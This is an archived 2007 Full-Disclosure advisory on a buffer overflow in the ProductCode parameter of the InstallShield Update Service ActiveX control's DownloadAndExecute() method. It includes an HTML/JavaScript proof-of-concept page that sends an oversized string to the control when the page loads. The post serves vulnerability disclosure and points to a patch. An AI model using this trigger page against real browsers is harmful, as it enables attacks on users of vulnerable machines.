Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18742
HistoryDec 26, 2007 - 12:00 a.m.

[Full-disclosure] Installshield Update Service isusweb.dll Buffer Overflow

2007-12-2600:00:00
vulners.com
11

The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an
exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute()
function. This object is marked safe for scripting. Note that this issue appears to different
from http://www.securityfocus.com/bid/26280(the iDefense advisory seems to be talking about insecure methods), however, the patch referenced in that
issue fixes this issue as well since the update renders this object unsafe for scripting.
PoC as follows:


<!–
written by e.b.
–>
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';

while &#40;s.length &lt;= 12000&#41; s = s + &#39;A&#39;;

obj.Initialize&#40;&quot;&quot;, &quot;&quot;, &quot;&quot;, &quot;&quot;&#41;;
obj.DownloadAndExecute&#40;&quot;&quot;, s, 0, &quot;&quot;, &quot;&quot;&#41;;

}
</script>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E"
/>
</object>
</body>
</html>

Elazar


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/